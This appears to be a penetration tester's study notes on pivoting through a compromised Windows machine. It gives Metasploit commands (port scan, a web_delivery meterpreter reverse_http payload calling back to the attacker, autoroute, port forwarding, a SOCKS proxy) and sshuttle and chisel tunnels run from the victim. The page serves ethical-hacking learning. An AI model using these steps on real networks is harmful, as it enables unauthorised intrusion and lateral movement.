-
We need to see what other access has our target machine
-
route print
C:\Windows\system32>route print route print =========================================================================== Interface List 12...08 00 27 ae c1 68 ......Intel(R) PRO/1000 MT Desktop Adapter 1...........................Software Loopback Interface 1 =========================================================================== IPv4 Route Table =========================================================================== Active Routes: Network Destination Netmask Gateway Interface Metric 0.0.0.0 0.0.0.0 192.168.57.1 10.0.2.15 25 10.0.2.0 255.255.255.0 On-link 10.0.2.15 281 10.0.2.15 255.255.255.255 On-link 10.0.2.15 281 10.0.2.255 255.255.255.255 On-link 10.0.2.15 281 127.0.0.0 255.0.0.0 On-link 127.0.0.1 331 127.0.0.1 255.255.255.255 On-link 127.0.0.1 331 127.255.255.255 255.255.255.255 On-link 127.0.0.1 331 224.0.0.0 240.0.0.0 On-link 127.0.0.1 331 224.0.0.0 240.0.0.0 On-link 10.0.2.15 281 255.255.255.255 255.255.255.255 On-link 127.0.0.1 331 255.255.255.255 255.255.255.255 On-link 10.0.2.15 281 =========================================================================== Persistent Routes: None IPv6 Route Table =========================================================================== Active Routes: If Metric Network Destination Gateway 1 331 ::1/128 On-link 12 281 fe80::/64 On-link 12 281 fe80::857:534f:3bb0:8fce/128 On-link 1 331 ff00::/8 On-link 12 281 ff00::/8 On-link =========================================================================== Persistent Routes: None
-
arp -a
Interface: 10.0.2.15 --- 0xc Internet Address Physical Address Type 10.0.2.3 08-00-27-35-94-d3 dynamic 10.0.2.4 08-00-27-fc-72-e9 dynamic 10.0.2.5 08-00-27-7f-90-90 dynamic 10.0.2.8 08-00-27-1d-d2-98 dynamic 10.0.2.255 ff-ff-ff-ff-ff-ff static 192.168.57.1 52-54-00-12-35-00 dynamic 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.251 01-00-5e-00-00-fb static 224.0.0.252 01-00-5e-00-00-fc static 239.255.255.250 01-00-5e-7f-ff-fa static 255.255.255.255 ff-ff-ff-ff-ff-ff static
-
Now that we have other interesting IPs we can try to reach those new ones
-
We can make a port scan on one of these IPs
-
use auxiliary/scanner/portscan/tcp
-
set rhosts 10.0.2.5
-
set ports 445
-
run
[+] 10.0.2.5: - 10.0.2.5:445 - TCP OPEN [*] 10.0.2.5: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
We could of course have set more ports and this would be a cool nmap like tool.
- We can assume that we have a shell with covenant for instance
- We generate a payload with metasploit through web delivery (more stealthy because it can pass as http traffic)
use exploit/multi/script/web_delivery
set target 2
(for powershell)set payload windows/x64/meterpreter/reverse_http
- set lhost to your attacking machine
- sel an lport
exploit -j
- Now we can copy the payload and paste to our grunt in Covenant
- Metasploit should now have opened a session
- We can choose an interface with
ipconfig
run autoroute -s 192.168.16.0/24
- We can check it's been done using
run autoroute -p
- We can now set up a reverse port forward
portfwd add -R -p 1234 -l 443 -L ATTACKING-MACHINE-IP
- We can check it's been done using
portfwd
- we can background our session with CTRL-Z
- We will setup a socks proxy
use auxiliary/server/socks4a
- We need to check our port in
/etc/proxychains4.conf
set srvport 9050
- we can check our jobs using
jobs
- We can kill the web delivery one that we do not need anymore
jobs -k ID-OF-JOB
- We now need to create a listener on covenant that will interact with the port forward set previously:
1 192.168.3.28:443 0.0.0.0:1234 Reverse
- BindAddress can stay at 0.0.0.0, BindPort should be 443, connectPort should be 1234 and connect address is the ip of our victime machine.
- We should now be able to reach other machine in the network of the initial machine that has now route to our attacking machine using proxychains
Let's say you got shell on a machine and this machine has access local to another (let's call it machine 2). Shuttle will allow you to access machine 2 from your network and act as a proxy.
sshuttle --listen 0.0.0.0 -e "ssh -i keyfile" -r user@IP-OF-YOUR-TARGET-MACHINE IP-OF-SUBNET-ACCESSIBLE-THROUGH-MACHINE2/24 -v
// example
sshuttle --listen 0.0.0.0 -e "ssh -i key" -r root@10.10.120.117 172.12.1.0/24 -v
- If you have a shell on a machine that has a local port open you can forward this port to your machine using chisel, it is called port forwarding for instance in our example we want to forward to listen the port 445 of the target machine that is open locally. You will then be able to intract from your kali on your port 445:
- On my kali `chisel server --reverse` (it is going to listen on port 8080)
- On the target `.\chisel.exe client KALI-IP:8080 R:445:127.0.0.1:445`
- You can check out examples of use of chisel on the chatterbox writeup or buffer overflow windows
- From my kali
chisel server --reverse
- From the victim machine
.\chisel.exe client IP-OF-KALI:8080 R:1080:socks
- In your
etc/proxychains4.conf
add this linesocks5 127.0.0.1 1080
{% embed url="https://orangecyberdefense.com/fr/insights/blog/ethical_hacking/etat-de-lart-du-pivoting-reseau-en-2019/" %} Amazing Resource about pivoting but only in french, it could def be read using google translate {% endembed %} {% embed url="https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course" %} TCM Security Academy - Practical Ethical Hacking - The Complete Course {% endembed %}